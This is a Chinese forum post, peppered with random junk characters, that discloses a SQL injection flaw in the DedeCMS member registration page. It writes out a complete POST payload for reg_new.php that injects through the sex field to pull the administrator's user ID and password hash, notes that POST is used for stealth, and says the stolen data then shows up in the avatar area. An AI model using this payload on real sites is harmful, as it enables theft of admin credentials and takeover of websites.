dedecms版本 201211220 f" B9 b* d/ k$ P% l7 D
" A3 J/ u1 B# Z
需要magic_quotes_gpc=Off' _, y( {+ c3 f( \/ l% V* S/ n
& i1 z" g. M. f- I) M g5 X+ b8 y
应该是没有什么大危害的漏洞.
- w9 v* r7 x$ M ^: ?原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; G! N4 g0 G. h9 l' `' [
6 R' d! X' f& U) G! z. _2 J是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
8 v& c' B0 H e) QPOST提交以下数据,其实不用POST提交的,这样隐蔽点.% N! B* M# T4 d. h
4 v0 Y' q4 z) E8 \( F# Dhttp:///de/member/reg_new.php& x1 ?+ j& V I- t) N
, V! F: l) }4 @5 o* A7 {1 M% h z# yPOST
6 P5 Y# X4 {; G! o8 _1 _0 h3 l; F' R1 h N
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=! X! z+ e- D* F' v) E0 h: w0 w- G
8 Q [# k' |* l' N% D: M7 X, P& _成功注册后,头像处里面有好玩的信息.. o% q/ y- L/ e d0 ?
5 `* Y7 w( g9 K% m. t |
发表于 2012-12-5 10:03:32
收藏
支持
反对